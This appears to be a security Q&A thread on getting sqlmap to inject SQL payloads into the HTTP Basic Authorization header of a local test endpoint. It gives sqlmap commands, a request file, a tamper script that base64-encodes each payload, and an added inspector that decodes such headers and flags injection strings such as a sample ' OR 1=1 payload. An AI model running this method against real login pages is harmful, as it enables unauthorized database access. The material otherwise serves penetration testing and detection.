
I have been trying to make sqlmap test the username parameter in a fake login page that uses basic authentication. However I cannot make it test the Authentication header via the asterisk trick:

sqlmap --auth-type "BASIC" --auth-cred="*:pass" --level 5 --risk 3 --method POST -u http://fake_endpoint.local/ --proxy http://127.0.0.1:8080

I receive at the proxy only one login attempt, with literally *:pass (b64: KjpwYXNz):

POST http://fake_endpoint.local/ HTTP/1.1
Content-Length: 0
Authorization: Basic KjpwYXNz
Cache-Control: no-cache
User-Agent: sqlmap/1.4.3#stable (http://sqlmap.org)
Referer: http://fake_endpoint.local/
Host: fake_endpoint.local
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

Any ideas if this is feasible through sqlmap?

chefarov

2 Answers


Without looking at the code and just making assumptions based on your results, I think that the authorization features of sqlmap are just there to allow you to perform tests while authenticated. They are likely not intended for this type of use.

However, Authorization is just another HTTP header, and sqlmap does support testing arbitrary HTTP headers.

So you could do:

--headers="Authorization: <base64_encoded_credentials>"

Unfortunately, this does not solve the base64 encoding problem. I would likely solve this one of these ways:

  1. Modify sqlmap to base64 encode the custom header field before making the request, or change it so your original method can be used as an injection point. The latter may be worth a pull request to the project, as others may use this feature.
  2. Build a quick middleware proxy using something like Flask. You'd point sqlmap at the local HTTP server, which receives the request, modifies the headers as desired, and forwards it to the original destination. I've used this approach successfully before to use sqlmap against non-HTTP targets.
multithr3at3d
  • Yes it seems that the only solutions are 1) PR or 2) `sqlmap --headers="Authorization: Basic *"` with a middleware/proxy that performs Base64 on each sqlmap payload – chefarov Apr 13 '20 at 22:12

This is a good use case for a custom tamper-script. Using the following request

# ./req
POST http://fake_endpoint.local/ HTTP/1.1
Content-Length: 0
Authorization: Basic *
Cache-Control: no-cache
User-Agent: sqlmap/1.4.3#stable (http://sqlmap.org)
Referer: http://fake_endpoint.local/
Host: fake_endpoint.local
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

and the following tamper script

#./tamper/basic_auth.py
import base64

def tamper(payload, **kwargs):
    # sqlmap substitutes each payload for the '*' in the request file, so the
    # payload here is the whole password; prefix the fixed username so the
    # encoded value is still a well-formed "username:password" credential
    auth = b'username:' + payload.encode()
    return base64.b64encode(auth).decode()

The following call to sqlmap will inject into the password

$ sqlmap -r ./req --tamper=./tamper/basic_auth.py

One of the early requests contains

Authorization: Basic dXNlcm5hbWU6NjUyOA==

for the header, which decodes to username:6528.

You may want to add the --proxy http://localhost:8080 flag so that your requests go through Burp and you can confirm that they're being properly encoded, and --ignore-code 403 so that any 403 errors from the base request (with no authentication) don't affect the operation of sqlmap.

Elliot
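The point both answers rest on is that the injected value ends up base64-encoded inside the Authorization header, so neither a proxy log nor a naive request filter shows it until the credential is decoded. The following inspector is an added example (not code from either answer or from sqlmap): it decodes Basic headers from captured request lines, handles malformed tokens, and flags SQL metacharacters in the decoded credential. The sample lines are constructed from the two headers quoted on this page plus one payload encoded the way the tamper script above encodes it; the SQLI_HINT pattern is an assumed heuristic, not a sqlmap or Burp signature.

```python
import base64
import binascii
import re

def decode_basic_auth(header_value):
    """Return (username, password) from a 'Basic <b64>' header value, or None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None  # not Basic auth (e.g. Bearer) or empty token
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None  # malformed base64
    # RFC 7617 leaves the charset unspecified; fall back to latin-1 so that
    # arbitrary injected bytes never crash the inspector.
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        text = raw.decode("latin-1")
    user, sep, password = text.partition(":")
    return (user, password) if sep else None  # no separator: not user:pass

# Assumed heuristic only: tune it to the application, since a legitimate
# password may itself contain quotes or the word "or".
SQLI_HINT = re.compile(r"['\"]|--|/\*|\b(?:OR|AND|UNION|SELECT|SLEEP)\b", re.I)

def scan_authorization_lines(raw_log):
    """Return [(decoded 'user:pass', suspicious_flag)] for each Basic header."""
    findings = []
    for line in raw_log.splitlines():
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        creds = decode_basic_auth(value)
        if creds is not None:
            cred = creds[0] + ":" + creds[1]
            findings.append((cred, bool(SQLI_HINT.search(cred))))
    return findings

# Constructed sample: the two headers quoted on this page plus one payload
# encoded the way the tamper script above does (username:<payload>).
SAMPLE_LOG = "\n".join([
    "Authorization: Basic KjpwYXNz",
    "Authorization: Basic dXNlcm5hbWU6NjUyOA==",
    "Authorization: Basic " + base64.b64encode(b"username:6528' OR 1=1-- ").decode(),
    "Authorization: Bearer not-basic",
])
```

Running scan_authorization_lines(SAMPLE_LOG) shows the first two page headers decoding cleanly and only the third line flagged, which is the check a reviewer would apply to a Burp capture before trusting that the tamper script encodes every request correctly.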